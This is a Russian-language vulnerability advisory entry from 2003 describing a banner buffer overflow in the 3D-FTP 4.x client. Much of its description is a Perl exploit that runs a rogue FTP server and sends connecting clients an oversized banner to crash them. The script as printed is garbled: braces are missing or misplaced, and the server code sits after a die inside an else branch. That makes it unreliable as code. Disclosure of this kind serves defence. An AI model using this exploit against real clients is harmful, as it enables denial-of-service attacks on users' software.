Дата публикации: | 02.05.2003 |
Дата изменения: | 17.10.2006 |
Всего просмотров: | 1107 |
Опасность: | |
Наличие исправления: | |
Количество уязвимостей: | 1 |
CVE ID: | Нет данных |
Вектор эксплуатации: | |
Воздействие: | |
CWE ID: | Нет данных |
Наличие эксплоита: | Нет данных |
Уязвимые продукты: | |
Описание: | Уязвимость обнаружена в 3D-FTP FTP клиенте. Удаленный FTP сервер может аварийно завершить работу сервиса.
Уязвимость происходит, когда FTP клиент получает чрезмерно длинный (>8192) FTP баннер. Эксплоит: #!/usr/bin/perl ######################################################## # Banner Buffer Overflow remote exploit in FTP Clients # by Over_G [DWC Gr0up] # www.dwcgr0up.com www.overg.com ######################################################### use IO::Socket; $port = "21"; $data = "a"; $bsize = $ARGV[0]; print "\n Banner Buffer Overflow remote exploit in FTP Clients\n\n"; print " by Over G[DWC Gr0up]\n"; print " www.dwcgr0up.com www.overg.com\n\n"; if (defined $bsize) {} else { print "Incorrect parameters.\n"; die "Usage: perl ftpbanex.pl [buffer_size]\n"; print "Creating server...\n"; $buf .= $data x $bsize; $server = IO::Socket::INET->new(LocalPort => $port, Type => SOCK_STREAM, Reuse => 1, Listen => 2) or die "Couldn't create server.\n"; print "Awayting connections...\n"; while ($client = $server->accept()) print "Client connected.\n"; print "Attacking..."; print $client "$buf"; print "OK\n"; close($client);Уязвимость обнаружена в 3D-FTP Client 4.x |
Ссылки: | Buffer overflow in 3D-ftp |